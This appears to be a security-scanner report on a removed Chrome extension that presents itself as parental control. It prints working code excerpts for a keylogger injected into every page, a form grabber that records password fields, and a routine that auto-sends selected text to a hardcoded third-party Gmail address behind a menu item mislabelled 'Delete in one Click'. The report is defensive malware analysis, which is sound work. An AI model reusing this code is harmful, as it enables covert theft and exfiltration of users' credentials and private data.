Keylogging and Send Data

ID: dnkoojdpknekhelendplnakmggonipnp

Supported Languages

🇺🇸US English

Extension Info & Metadata

Status
Removed
Version
1.0
Size
0.34 MB
Rating
1.0/5
Reviews
1
Users
682
Type
Extension
Updated
May 28, 2022
Category
Make_chrome_yours Accessibility
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
Yes

Publisher Contextual Analysis

Trusted
Author
justfortestingjftView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
3
Active
0
Obsolete
3
Listed
3
Unlisted
0
Total Users
745

A keylogger, saves form ids,saves all keylogs and you can select text and by clicking can share data via gmail.

It store keylogs, all keys pressed on which websites ,remove words from web page like (jeans, shoe, cream and coronavirus) ,you can delete keylogs by selecting date. This extension can be used as a parental control. You can also select text on any web page and on click by selecting options from contextmenu by selecting delete in one click, we can share selected text via mail(sender id would be logged in id by default and receiver's id given in code of extension by default)

Item
Type
Severity
Description
scripting
Permission
Critical
This permission allows injection and execution of JavaScript on any webpage. Rated Critical because it can modify page content, steal sensitive data, and inject malicious code into any site the extension has access to.
<all_urls>
Host
Critical
Broad host access — the extension can read/modify content on every website.
Contextual Risk Factors
Risk Factor
High
The following context increases the overall risk:• 20% increase: Access to sensitive domains increases potential impact
Broad Host Permissions
Risk Factor
High
This extension has broad host permissions allowing it to access many or all websites.
Broad Content Script Access
Risk Factor
High
This extension can inject scripts into any website.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
unlimitedStorage
Permission
Medium
This permission removes storage quota restrictions. Rated Medium because it can store large amounts of user data without limits, potentially impacting browser performance and storing extensive tracking data.
tabs
Permission
Medium
This permission enables tab management and monitoring. Rated Medium because it can track open tabs, access tab metadata, and monitor user browsing patterns.
activeTab
Permission
Medium
This permission grants temporary access to the current tab. Rated Medium because it can access current page content when invoked, though limited to user-initiated actions.
https://mail.google.com/*
Host
Medium
Host permission — access limited to this URL pattern.
Access to Sensitive Domains
Risk Factor
Medium
This extension requests access to sensitive domains: https://mail.google.com/*
contextMenus
Permission
Low
This permission adds items to browser context menus. Rated Medium because it only modifies right-click menus without access to page content.

On every completed page load across all URLs, the extension injects the full keylogger payload (`payload.js`) into the page. This is unconditional — it fires on banking sites, password manager UIs, healthcare portals, and any other sensitive context the user visits. There is no allowlist or user opt-in.

js/inject/inject.js (Line 1)
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo) {  if (changeInfo.status === 'complete') {    chrome.scripting.executeScript({      target: {        tabId: tabId      },      files: ['js/inject/payload.js'],    }, () => chrome.runtime.lastError);  }});

The payload captures every alphanumeric keypress on every website and persists it to `chrome.storage.local` keyed by timestamp, URL, and page title. This records passwords, credit card numbers, search queries, and any other text the user types anywhere. The stored format (`title^~^url^~^keystrokes`) is trivially parseable for credential extraction.

js/inject/payload.js (Line 8)
document.addEventListener('keypress', function(e) {  e = e || window.event;  var charCode = typeof e.which == "number" ? e.which : e.keyCode;  if (charCode) {    log(String.fromCharCode(charCode));  }});// ...var time = new Date().getTime();var data = {};data[time] = document.title + "^~^" + document.URL + "^~^";function log(input) {  var now = new Date().getTime();  if (now - lastLog < 10) return;  data[time] += input;  shouldSave = true;  lastLog = now;}function save() {  if (shouldSave) {    chrome.storage.local.set(data, function() {});  }}

When `formsaver` is enabled, the extension intercepts every form submission on every website and records the complete set of field names and values — including password fields — to local storage. Login forms, payment forms, and any other credential-bearing form are fully captured with no site restriction.

js/inject/payload.js (Line 185)
chrome.storage.sync.get({  formsaver: false}, function(settings) {  if (settings.formsaver) {    var forms = document.getElementsByTagName("form");    for (var i = 0; i < forms.length; i++) {      forms[i].addEventListener("submit", function(e) {        var data = {};        data["FormName"] = e.target.name;        data["FormAction"] = e.target.action;        data["FormElements"] = {};        var elements = e.target.elements;        for (var n = 0; n < elements.length; n++) {          data["FormElements"][elements[n].name] = elements[n].value;        }        saveForm(e.timeStamp, data);      });    }  }});

The recipient email is hardcoded as `[email protected]` — a different entity from the publisher (`[email protected]`). When the user right-clicks and selects 'Delete in one Click', the extension silently opens a hidden Gmail compose tab pre-filled with the current page URL and selected text addressed to this hardcoded third party, then programmatically clicks the Send button (Gmail DOM element `:oy`) without any user review or confirmation. This is covert data exfiltration to an unrelated third party disguised as a local delete action.

background.js (Line 10)
chrome.storage.sync.get("mailTo", function(storage) {  mailToAddress = "[email protected]"})chrome.contextMenus.onClicked.addListener(function(data) {  if (data.menuItemId == "emailMe") {    chrome.tabs.query({      currentWindow: true,      active: true    }, function(tabs) {      var emailAddress = mailToAddress      var title = tabs[0].title      var url = tabs[0].url      var body = `Emailed from ${url} ${data.selectionText || ''}`      var gmailUrl =        `https://mail.google.com/mail/?view=cm&fs=1&tf=1&to=${emailAddress}&su=${title}&body=${body}`      chrome.tabs.create({        url: gmailUrl,        active: false      }, function(tab) {        var gmailTab = tab.id        chrome.tabs.onUpdated.addListener(function(tabId, info) {          if (tabId === gmailTab) {            function code() {              if (document.getElementById(':oy')) {                var Send = document.getElementById(':oy')                Send.click()              }            }            chrome.scripting.executeScript({              target: {                tabId: tabId              },              func: code            });          }        })      })    })  }})

The context menu entry is labelled 'Delete in one Click' but its actual function — as implemented in the `onClicked` handler — is to email the selected text and page URL to a hardcoded third-party address. This deliberate mislabelling is a social-engineering technique to trick users into exfiltrating their own data.

background.js (Line 3)
chrome.runtime.onInstalled.addListener(() => {  chrome.contextMenus.create({    "id": "emailMe",    "title": "Delete in one Click",    "contexts": ["selection", "page"]  });});

By severity

Critical4
High1
Medium0
Low0

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
1.05

Files with findings

3 distinct paths — top paths by unique finding count:

  • background.js2
  • js/inject/payload.js2
  • js/inject/inject.js1
S.No.
Category
Severity
File
Summary
Found in Version
1Credential Theft
critical
js/inject/payload.js (line 8)The payload captures every alphanumeric keypress on every website and persists it to `chrome.storage.local` keyed by timestamp, URL, and page title. This records passwords, credit card numbers, search queries, and any…
2Credential Theft
critical
js/inject/payload.js (line 185)When `formsaver` is enabled, the extension intercepts every form submission on every website and records the complete set of field names and values — including password fields — to local storage. Login forms, payment …
3Data Exfiltration
critical
background.js (line 10)The recipient email is hardcoded as `[email protected]` — a different entity from the publisher (`[email protected]`). When the user right-clicks and selects 'Delete in one Click', the extension silently o…
4Unauthorized Data Collection
critical
js/inject/inject.js (line 1)On every completed page load across all URLs, the extension injects the full keylogger payload (`payload.js`) into the page. This is unconditional — it fires on banking sites, password manager UIs, healthcare portals,…
5Phishing
high
background.js (line 3)The context menu entry is labelled 'Delete in one Click' but its actual function — as implemented in the `onClicked` handler — is to email the selected text and page URL to a hardcoded third-party address. This delibe…
URLs
19
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

mail.google.com/mail/https://mail.google.com/mail/?view=cm&fs=1&tf=1&to=${emailAddress}&su=${title}&body=${body}`
ns.adobe.com/xap/1.0/http://ns.adobe.com/xap/1.0/
www.w3.org/1999/02/22-rdf-syntax-nshttp://www.w3.org/1999/02/22-rdf-syntax-ns#
ns.adobe.com/photoshop/1.0/http://ns.adobe.com/photoshop/1.0/
iptc.org/std/Iptc4xmpCore/1.0/xmlns/http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
xmp.gettyimages.com/gift/1.0/http://xmp.gettyimages.com/gift/1.0/
purl.org/dc/elements/1.1/http://purl.org/dc/elements/1.1/
ns.useplus.org/ldf/xmp/1.0/http://ns.useplus.org/ldf/xmp/1.0/
iptc.org/std/Iptc4xmpExt/2008-02-29/http://iptc.org/std/Iptc4xmpExt/2008-02-29/
ns.adobe.com/xap/1.0/rights/http://ns.adobe.com/xap/1.0/rights/
Showing 1 to 10 of 20 rows
Rows per page:

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
1.0
Latest
0.34 MB
Malicious
5
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.